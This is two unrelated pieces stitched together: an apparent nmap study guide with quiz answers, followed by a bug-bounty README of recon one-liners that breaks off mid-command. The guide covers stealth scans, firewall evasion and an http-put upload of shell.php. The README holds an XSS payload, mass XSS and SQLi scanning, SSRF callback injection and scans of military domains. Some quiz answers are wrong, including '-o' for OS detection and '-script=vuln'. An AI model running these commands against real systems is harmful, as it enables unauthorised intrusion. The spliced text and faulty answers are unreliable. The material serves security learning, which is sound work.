Once again, this will be covered more in upcoming tasks. For now, it is important that you understand: what port scanning is; why it is necessary; and that nmap is the tool of choice for any kind of initial enumeration. 1. What networking constructs are used to direct traffic to the right application on a server? __Ans.__ Ports 2. How many of these are available on any network-enabled computer? __Ans.__ 65535 3. How many of these are considered "well-known"? __Ans.__ 1024 #### Cheatsheet ##### Nmap Target Selection | Description | Command | | -------- | -------------- | |Scan a single IP |`nmap 192.168.1.1` | |Scan a host | `nmap www.testhostname.com` | |Scan a range of IPs |`nmap 192.168.1.1-20`| |Scan a subnet |`nmap 192.168.1.0/24`| |Scan targets from a text file|`nmap -iL list-of-ips.txt`| - __Note__: ```These are all default scans, which will scan 1000 TCP ports. Host discovery will take place.``` ##### Nmap Port Selection | Description | Command | | -------- | -------------- | |Scan a single Port |`nmap -p 22 192.168.1.1`| |Scan a range of ports |`nmap -p 1-100 192.168.1.1`| |Scan 100 most common ports (Fast) |`nmap -F 192.168.1.1`| |Scan all 65535 ports |`nmap -p- 192.168.1.1`| ##### Nmap Port scan types | Description | Command | | -------- | -------------- | |Scan using TCP connect |`nmap -sT 192.168.1.1`| |Scan using TCP SYN scan (default) |`nmap -sS 192.168.1.1`| |Scan UDP ports |`nmap -sU -p 123,161,162 192.168.1.1`| |Scan selected ports - ignore discovery|`nmap -Pn -F 192.168.1.1`| - __Note:__ *Privileged access is required to perform the default SYN scans. If privileges are insufficient a TCP connect scan will be used. A TCP connect requires a full TCP connection to be established and therefore is a slower scan. Ignoring discovery is often required as many firewalls or hosts will not respond to PING, so could be missed unless you select the -Pn parameter. Of course this can make scan times much longer as you could end up sending scan probes to hosts that are not there.* ##### Service and OS Detection | Description | Command | | -------- | -------------- | |Detect OS and Services |`nmap -A 192.168.1.1`| |Standard service detection |`nmap -sV 192.168.1.1`| |More aggressive Service Detection |`nmap -sV --version-intensity 5 192.168.1.1`| |Lighter banner grabbing detection |`nmap -sV --version-intensity 0 192.168.1.1`| - __Note:__ *Service and OS detection rely on different methods to determine the operating system or service running on a particular port. The more aggressive service detection is often helpful if there are services running on unusual ports. On the other hand the lighter version of the service will be much faster as it does not really attempt to detect the service simply grabbing the banner of the open service.* ##### Nmap Output Formats | Description | Command | | -------- | -------------- | |Save default output to file |`nmap -oN outputfile.txt 192.168.1.1`| |Save results as XML |`nmap -oX outputfile.xml 192.168.1.1`| |Save results in a format for grep |`nmap -oG outputfile.txt 192.168.1.1`| |Save in all formats |`nmap -oA outputfile 192.168.1.1`| ##### Digging deeper with NSE Scripts | Description | Command | | -------- | -------------- | |Scan using default safe scripts |`nmap -sV -sC 192.168.1.1`| |Get help for a script |`nmap --script-help=ssl-heartbleed`| |Scan using a specific NSE script |`nmap -sV -p 443 –script=ssl-heartbleed.nse 192.168.1.1`| |Scan with a set of scripts |`nmap -sV --script=smb* 192.168.1.1`| <!-- ||| --> - A scan to search for DDOS reflection UDP services | Scan for UDP DDOS reflectors | ` nmap –sU –A –PN –n –pU:19,53,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr 192.168.1.0/24` | | -------- | -------------- | <!-- ||| --> ##### HTTP Service Information | Description | Command | | -------- | -------------- | |Gather page titles from HTTP services|`nmap --script=http-title 192.168.1.0/24`| |Get HTTP headers of web services |`nmap --script=http-headers 192.168.1.0/24`| |Find web apps from known paths |`nmap --script=http-enum 192.168.1.0/24`| #### 2. Nmap Switches Like most pentesting tools, nmap is run from the terminal. There are versions available for both Windows and Linux. For this room we will assume that you are using Linux; however, the switches should be identical. Nmap can be accessed by typing `nmap` into the terminal command line, followed by some of the "switches" (command arguments which tell a program to do different things) we will be covering below. All you'll need for this is the help menu for nmap (accessed with nmap -h) and/or the nmap man page (access with `man nmap`). For each answer, include all parts of the switch unless otherwise specified. This includes the hyphen at the start (`-`). 1. What is the first switch listed in the help menu for a `Syn Scan` ? __Ans.__ __`-sS`__ 2. Which switch would you use for a "UDP scan"? __Ans.__ __`-sU`__ 3. If you wanted to detect which operating system the target is running on, which switch would you use? *Answer.* __`-o`__ 4. Nmap provides a switch to detect the version of the services running on the target. What is this switch? __Ans.__ __`-sV`__ 5. The default output provided by nmap often does not provide enough information for a pentester. How would you increase the verbosity? __Ans.__ __`-v`__ 6. Verbosity level one is good, but verbosity level two is better! How would you set the verbosity level to two? __Ans.__ __`-vv`__ 7. We should always save the output of our scans -- this means that we only need to run the scan once (reducing network traffic and thus chance of detection), and gives us a reference to use when writing reports for clients. What switch would you use to save the nmap results in three major formats? __Ans.__ __`-oA`__ 8. What switch would you use to save the nmap results in a "normal" format?\ __Ans.__ __`-oN`__ 9. A very useful output format: how would you save results in a "grepable" format? __Ans.__ __`-oG`__ 10. Sometimes the results we're getting just aren't enough. If we don't care about how loud we are, we can enable "aggressive" mode. This is a shorthand switch that activates service detection, operating system detection, a traceroute and common script scanning. How would you activate this setting? __Ans.__ __`-A`__ 11. Nmap offers five levels of "timing" template. These are essentially used to increase the speed your scan runs at. Be careful though: higher speeds are noisier, and can incur errors! How would you set the timing template to level 5? __Ans.__ __`-T5`__ 12. How would you tell nmap to only scan port 80? __Ans.__ __`-p 80`__ 13. How would you tell nmap to scan ports 1000-1500? __Ans.__ __`-p 1000-1500`__ 14. How would you tell nmap to scan all ports? __Ans.__ __`-p-`__ 15. How would you activate a script from the nmap scripting library? __Ans.__ __`--script`__ 16. How would you activate all of the scripts in the "vuln" category? __Ans.__ __`-script=vuln`__ #### 3. TCP Connect Scans - The three-way handshake consists of three stages. First the connecting terminal (our attacking machine, in this instance) sends a TCP request to the target server with the SYN flag set. The server then acknowledges this packet with a TCP response containing the SYN flag, as well as the ACK flag. Finally, our terminal completes the handshake by sending a TCP request with the ACK flag set. ![Three way handshake](https://muirlandoracle.co.uk/wp-content/uploads/2020/03/image-2.png) - a TCP Connect scan works by performing the three-way handshake with each target port in turn. In other words, Nmap tries to connect to each specified TCP port, and determines whether the service is open by the response it receives. - For example, if a port is closed, RFC 793 states that: "... If the connection does not exist (CLOSED) then a reset is sent in response to any incoming segment except another reset. In particular, SYNs addressed to a non-existent connection are rejected by this means." In other words, if Nmap sends a TCP request with the SYN flag set to a closed port, the target server will respond with a TCP packet with the RST (Reset) flag set. By this response, Nmap can establish that the port is closed. ![SYN-Flag](https://i.imgur.com/vUQL9SK.png) - If, however, the request is sent to an open port, the target will respond with a TCP packet with the SYN/ACK flags set. Nmap then marks this port as being open (and completes the handshake by sending back a TCP packet with ACK set). - What if the port is open, but hidden behind a firewall? Many firewalls are configured to simply drop incoming packets. Nmap sends a TCP SYN request, and receives nothing back. This indicates that the port is being protected by a firewall and thus the port is considered to be filtered. That said, it is very easy to configure a firewall to respond with a RST TCP packet. For example, in IPtables for Linux, a simple version of the command would be as follows: `iptables -I INPUT -p tcp --dport <port> -j REJECT --reject-with tcp-reset` - This can make it extremely difficult (if not impossible) to get an accurate reading of the target(s). 1. If a port is closed, which flag should the server send back to indicate this? __Ans.__ `RST` #### 4. SYN Scans As with TCP scans, SYN scans (`-sS`) are used to scan the TCP port-range of a target or targets; however, the two scan types work slightly differently. SYN scans are sometimes referred to as "Half-open" scans, or "Stealth" scans. Where TCP scans perform a full three-way handshake with the target, SYN scans sends back a RST TCP packet after receiving a SYN/ACK from the server (this prevents the server from repeatedly trying to make the request). In other words, the sequence for scanning an open port looks like this: ![SYN scan ](https://i.imgur.com/cPzF0kU.png) - This has a variety of advantages for us as hackers: - It can be used to bypass older Intrusion Detection systems as they are looking out for a full three way handshake. This is often no longer the case with modern IDS solutions; it is for this reason that SYN scans are still frequently referred to as "stealth" scans. - SYN scans are often not logged by applications listening on open ports, as standard practice is to log a connection once it's been fully established. Again, this plays into the idea of SYN scans being stealthy. - Without having to bother about completing (and disconnecting from) a three-way handshake for every port, SYN scans are significantly faster than a standard TCP Connect scan. There are, however, a couple of disadvantages to SYN scans, namely: - They require sudo permissions[1] in order to work correctly in Linux. This is because SYN scans require the ability to create raw packets (as opposed to the full TCP handshake), which is a privilege only the root user has by default. - Unstable services are sometimes brought down by SYN scans, which could prove problematic if a client has provided a production environment for the test. All in all, the pros outweigh the cons. - For this reason, SYN scans are the default scans used by Nmap if run with sudo permissions. If run without sudo permissions, Nmap defaults to the TCP Connect scan we saw in the previous task. <hr></hr> When using a SYN scan to identify closed and filtered ports, the exact same rules as with a TCP Connect scan apply. If a port is closed then the server responds with a RST TCP packet. If the port is filtered by a firewall then the TCP SYN packet is either dropped, or spoofed with a TCP reset. In this regard, the two scans are identical: the big difference is in how they handle open ports. <hr></hr> 1. There are two other names for a SYN scan, what are they? __Ans:__ __Half-Open, Stealth__ #### 5.UDP Scans Unlike TCP, UDP connections are stateless. This means that, rather than initiating a connection with a back-and-forth "handshake", UDP connections rely on sending packets to a target port and essentially hoping that they make it. This makes UDP superb for connections which rely on speed over quality (e.g. video sharing), but the lack of acknowledgement makes UDP significantly more difficult (and much slower) to scan. The switch for an Nmap UDP scan is (`-sU`) When a packet is sent to an open UDP port, there should be no response. When this happens, Nmap refers to the port as being `open|filtered`. In other words, it suspects that the port is open, but it could be firewalled. If it gets a UDP response (which is very unusual), then the port is marked as open. More commonly there is no response, in which case the request is sent a second time as a double-check. If there is still no response then the port is marked open|filtered and Nmap moves on. When a packet is sent to a closed UDP port, the target should respond with an ICMP (ping) packet containing a message that the port is unreachable. This clearly identifies closed ports, which Nmap marks as such and moves on. Due to this difficulty in identifying whether a UDP port is actually open, UDP scans tend to be incredibly slow in comparison to the various TCP scans (in the region of 20 minutes to scan the first 1000 ports, with a good connection). For this reason it's usually good practice to run an Nmap scan with `--top-ports <number>` enabled. For example, scanning with `nmap -sU --top-ports 20 <target>`. Will scan the top 20 most commonly used UDP ports, resulting in a much more acceptable scan time. When scanning UDP ports, Nmap usually sends completely empty requests -- just raw UDP packets. That said, for ports which are usually occupied by well-known services, it will instead send a protocol-specific payload which is more likely to elicit a response from which a more accurate result can be drawn. 1. If a UDP port doesn't respond to an Nmap scan, what will it be marked as? __Ans:__ `open|filtered` 2. When a UDP port is closed, by convention the target should send back a "port unreachable" message. Which protocol would it use to do so? __Ans: ICMP__ #### 6. NULL, FIX and XMAS NULL, FIN and Xmas TCP port scans are less commonly used than any of the others we've covered already, so we will not go into a huge amount of depth here. All three are interlinked and are used primarily as they tend to be even stealthier, relatively speaking, than a SYN "stealth" scan. Beginning with NULL scans: - As the name suggests, NULL scans (`-sN`) are when the TCP request is sent with no flags set at all. As per the RFC, the target host should respond with a RST if the port is closed. - FIN scans (`-sF`) work in an almost identical fashion; however, instead of sending a completely empty packet, a request is sent with the FIN flag (usually used to gracefully close an active connection). Once again, Nmap expects a RST if the port is closed. - As with the other two scans in this class, Xmas scans (`-sX`) send a malformed TCP packet and expects a RST response for closed ports. It's referred to as an xmas scan as the flags that it sets (PSH, URG and FIN) give it the appearance of a blinking christmas tree when viewed as a packet capture in Wireshark. ![XMAS Scan](https://i.imgur.com/gKVkGug.png) The expected response for open ports with these scans is also identical, and is very similar to that of a UDP scan. If the port is open then there is no response to the malformed packet. Unfortunately (as with open UDP ports), that is also an expected behaviour if the port is protected by a firewall, so NULL, FIN and Xmas scans will only ever identify ports as being open|filtered, closed, or filtered. If a port is identified as filtered with one of these scans then it is usually because the target has responded with an ICMP unreachable packet. It's also worth noting that while RFC 793 mandates that network hosts respond to malformed packets with a RST TCP packet for closed ports, and don't respond at all for open ports; this is not always the case in practice. In particular Microsoft Windows (and a lot of Cisco network devices) are known to respond with a RST to any malformed TCP packet -- regardless of whether the port is actually open or not. This results in all ports showing up as being closed. That said, the goal here is, of course, firewall evasion. Many firewalls are configured to drop incoming TCP packets to blocked ports which have the SYN flag set (thus blocking new connection initiation requests). By sending requests which do not contain the SYN flag, we effectively bypass this kind of firewall. Whilst this is good in theory, most modern IDS solutions are savvy to these scan types, so don't rely on them to be 100% effective when dealing with modern systems. 1. Which of the three shown scan types uses the URG flag? __Ans: XMAS__ 2. Why are NULL, FIN and Xmas scans generally used? __Ans: Firewall Evasion__ 3. Which common OS may respond to a NULL, FIN or Xmas scan with a RST for every port? __Ans: Microsoft Windows__ #### ICMP Network Scanning On first connection to a target network in a black box assignment, our first objective is to obtain a "map" of the network structure -- or, in other words, we want to see which IP addresses contain active hosts, and which do not. One way to do this is by using Nmap to perform a so called "ping sweep". This is exactly as the name suggests: Nmap sends an ICMP packet to each possible IP address for the specified network. When it receives a response, it marks the IP address that responded as being alive. For reasons we'll see in a later task, this is not always accurate; however, it can provide something of a baseline and thus is worth covering. To perform a ping sweep, we use the `-sn` switch in conjunction with IP ranges which can be specified with either a hypen (`-`) or CIDR notation. i.e. we could scan the `192.168.0.x` network using - `nmap -sn 192.168.0.1-254` or - `nmap -sn 192.168.0.0/24` The `-sn` switch tells Nmap not to scan any ports -- forcing it to rely primarily on ICMP echo packets (or ARP requests on a local network, if run with sudo or directly as the root user) to identify targets. In addition to the ICMP echo requests, the `-sn` switch will also cause nmap to send a TCP SYN packet to port 443 of the target, as well as a TCP ACK (or TCP SYN if not run as root) packet to port 80 of the target. 1. How would you perform a ping sweep on the 172.16.x.x network (Netmask: 255.255.0.0) using Nmap? (CIDR notation) __Ans__ `nmap -sn 172.16.0.0/16` #### NSE Scripts Overview The Nmap Scripting Engine (NSE) is an incredibly powerful addition to Nmap, extending its functionality quite considerably. NSE Scripts are written in the Lua programming language, and can be used to do a variety of things: from scanning for vulnerabilities, to automating exploits for them. The NSE is particularly useful for reconnaisance, however, it is well worth bearing in mind how extensive the script library is. There are many categories available. Some useful categories include: - `safe`:- Won't affect the target - `intrusive`:- Not safe: likely to affect the target - `vuln`:- Scan for vulnerabilities - `exploit`:- Attempt to exploit a vulnerability - `auth`:- Attempt to bypass authentication for running services (e.g. Log into an FTP server anonymously) - `brute`:- Attempt to bruteforce credentials for running services - `discovery`:- Attempt to query running services for further information about the network (e.g. query an SNMP server). The `--script` switch for activating NSE scripts from the `vuln` category using `--script=vuln`. It should come as no surprise that the other categories work in exactly the same way. If the command `--script=safe` is run, then any applicable safe scripts will be run against the target (Note: only scripts which target an active service will be activated). To run a specific script, we would use `--script=<script-name>` , e.g. `--script=http-fileupload-exploiter`. Multiple scripts can be run simultaneously in this fashion by separating them by a comma. For example:` --script=smb-enum-users,smb-enum-shares`. Some scripts require arguments (for example, credentials, if they're exploiting an authenticated vulnerability). These can be given with the` --script-args` Nmap switch. An example of this would be with the `http-put` script (used to upload files using the PUT method). This takes two arguments: the URL to upload the file to, and the file's location on disk. For example: <code> nmap -p 80 --script http-put --script-args http-put.url='/dav/shell.php',http-put.file='./shell.php' </code> - Note that the arguments are separated by commas, and connected to the corresponding script with periods (i.e. `<script-name>.<argument>`). #### Firewall Evasion We have already seen some techniques for bypassing firewalls (think stealth scans, along with NULL, FIN and Xmas scans); however, there is another very common firewall configuration which it's imperative we know how to bypass. Your typical Windows host will, with its default firewall, block all ICMP packets. This presents a problem: not only do we often use ping to manually establish the activity of a target, Nmap does the same thing by default. This means that Nmap will register a host with this firewall configuration as dead and not bother scanning it at all. So, we need a way to get around this configuration. Fortunately Nmap provides an option for this: `-Pn`, which tells Nmap to not bother pinging the host before scanning it. This means that Nmap will always treat the target host(s) as being alive, effectively bypassing the ICMP block; however, it comes at the price of potentially taking a very long time to complete the scan (if the host really is dead then Nmap will still be checking and double checking every specified port). It's worth noting that if you're already directly on the local network, Nmap can also use ARP requests to determine host activity. There are a variety of other switches which Nmap considers useful for firewall evasion. We will not go through these in detail, however, they can be found here. The following switches are of particular note: - `-f`:- Used to fragment the packets (i.e. split them into smaller pieces) making it less likely that the packets will be detected by a firewall or IDS. An alternative to `-f`, but providing more control over the size of the packets: `--mtu <number>`, accepts a maximum transmission unit size to use for the packets sent. This must be a multiple of 8. - `--scan-delay <time>ms`:- used to add a delay between packets sent. This is very useful if the network is unstable, but also for evading any time-based firewall/IDS triggers which may be in place. - `--badsum`:- this is used to generate in invalid checksum for packets. Any real TCP/IP stack would drop this packet, however, firewalls may potentially respond automatically, without bothering to check the checksum of the packet. As such, this switch can be used to determine the presence of a firewall/IDS. <br></br><br></br><br></br><br></br><br></br><br></br>
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. 👑 ## Stats King ![OFJAAAH](https://github-readme-stats.vercel.app/api?username=KingOfBugbounty&show_icons=true&theme=dracula) [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) <div> <a href="https://www.linkedin.com/in/atjunior/"><img src="https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white"></img></a> <a href="https://www.youtube.com/c/OFJAAAH"><img src="https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white"></a> </div> ## BugBuntu Download - [BugBuntu](https://sourceforge.net/projects/bugbuntu/) - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) ## Special thanks - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) - [@wellpunk](https://twitter.com/wellpunk) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Amass](https://github.com/OWASP/Amass) - [Anew](https://github.com/tomnomnom/anew) - [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl) - [Assetfinder](https://github.com/tomnomnom/assetfinder) - [Axiom](https://github.com/pry0cc/axiom) - [Bhedak](https://github.com/R0X4R/bhedak) - [CF-check](https://github.com/dwisiswant0/cf-check) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Cariddi](https://github.com/edoardottt/cariddi) - [Dalfox](https://github.com/hahwul/dalfox) - [DNSgen](https://github.com/ProjectAnte/dnsgen) - [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Fuff](https://github.com/ffuf/ffuf) - [Gargs](https://github.com/brentp/gargs) - [Gau](https://github.com/lc/gau) - [Gf](https://github.com/tomnomnom/gf) - [Github-Search](https://github.com/gwen001/github-search) - [Gospider](https://github.com/jaeles-project/gospider) - [Gowitness](https://github.com/sensepost/gowitness) - [Hakrawler](https://github.com/hakluke/hakrawler) - [HakrevDNS](https://github.com/hakluke/hakrevdns) - [Haktldextract](https://github.com/hakluke/haktldextract) - [Haklistgen](https://github.com/hakluke/haklistgen) - [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Jsubfinder](https://github.com/ThreatUnkown/jsubfinder) - [Kxss](https://github.com/Emoe/kxss) - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [log4j-scan](https://github.com/fullhunt/log4j-scan) - [Metabigor](https://github.com/j3ssie/metabigor) - [MassDNS](https://github.com/blechschmidt/massdns) - [Naabu](https://github.com/projectdiscovery/naabu) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Rush](https://github.com/shenwei356/rush) - [SecretFinder](https://github.com/m4ll0k/SecretFinder) - [Shodan](https://help.shodan.io/command-line-interface/0-installation) - [ShuffleDNS](https://github.com/projectdiscovery/shuffledns) - [SQLMap](https://github.com/sqlmapproject/sqlmap) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [SubJS](https://github.com/lc/subjs) - [Unew](https://github.com/dwisiswant0/unew) - [WaybackURLs](https://github.com/tomnomnom/waybackurls) - [Wingman](https://xsswingman.com/#faq) - [Notify](https://github.com/projectdiscovery/notify) - [Goop](https://github.com/deletescape/goop) - [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - [GetJS](https://github.com/003random/getJS) - [X8](https://github.com/Sh1Yo/x8) - [Unfurl](https://github.com/tomnomnom/unfurl) - [XSStrike](https://github.com/s0md3v/XSStrike) - [Page-fetch](https://github.com/detectify/page-fetch) ### BBRF SCOPE DoD ```bash bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' ``` ### Scan log4j using BBRF and log4j-scan - [Explained command](https://bit.ly/3IUivk9) ```bash bbrf domains | httpx -silent | xargs -I@ sh -c 'python3 http://log4j-scan.py -u "@"' ``` ### Bhedak - [Explained command](https://bit.ly/3oNisxi) ```bash cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}" ``` ### .bashrc shortcut OFJAAAH ```bash reconjs(){ gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt } cert(){ curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew } anubis(){ curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew } ``` ### Oneliner Haklistgen - @hakluke ```bash subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt; ``` ### Running JavaScript on each page send to proxy. - [Explained command](https://bit.ly/3daIyFw) ```bash cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080 ``` ### Running cariddi to Crawler - [Explained command](https://bit.ly/3hQPF8w) ```bash echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/3nnEhCj) ```bash xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer' ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/324Sr1x) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ ``` ### Using x8 to Hidden parameters discovery - [Explaining command](https://bit.ly/3w48wl8) ```bash assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate' ``` ### Extract .js Subdomains - [Explaining command](https://bit.ly/339CN5p) ```bash echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 ``` ### goop to search .git files. - [Explaining command](https://bit.ly/3d0VcY5) ```bash xargs -a xss -P10 -I@ sh -c 'goop @' ``` ### Using chaos list to enumerate endpoint ```bash curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @' ``` ### Using Wingman to search XSS reflect / DOM XSS - [Explaining command](https://bit.ly/3m5ft1g) ```bash xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify' ``` ### Search ASN to metabigor and resolvers domain - [Explaining command](https://bit.ly/3bvghsY) ```bash echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ``` ### OneLiners ### Search .json gospider filter anti-burl - [Explaining command](https://bit.ly/3eoUhSb) ```bash gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl ``` ### Search .json subdomain - [Explaining command](https://bit.ly/3kZydis) ```bash assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew ``` ### SonarDNS extract subdomains - [Explaining command](https://bit.ly/2NvXRyv) ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command](https://bit.ly/3aaEDHL) ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command](https://bit.ly/3aMXQOF) ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command](https://bit.ly/3aKSSCb) ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command](https://bit.ly/2MKkOxm) ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command](https://bit.ly/2NIavul) ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command](https://bit.ly/3c2t6eG) ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command](https://bit.ly/362LyQF) ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command](https://bit.ly/3sD0pLv) ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command](https://bit.ly/3nWHM22) ```bash chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1 ``` ### Download all domains to bounty chaos - [Explaining command](https://bit.ly/38wPQ4o) ```bash curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command](https://bit.ly/3shFFJ5) ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command](https://bit.ly/2L3YVsc) ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command](https://bit.ly/354lYuf) ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli 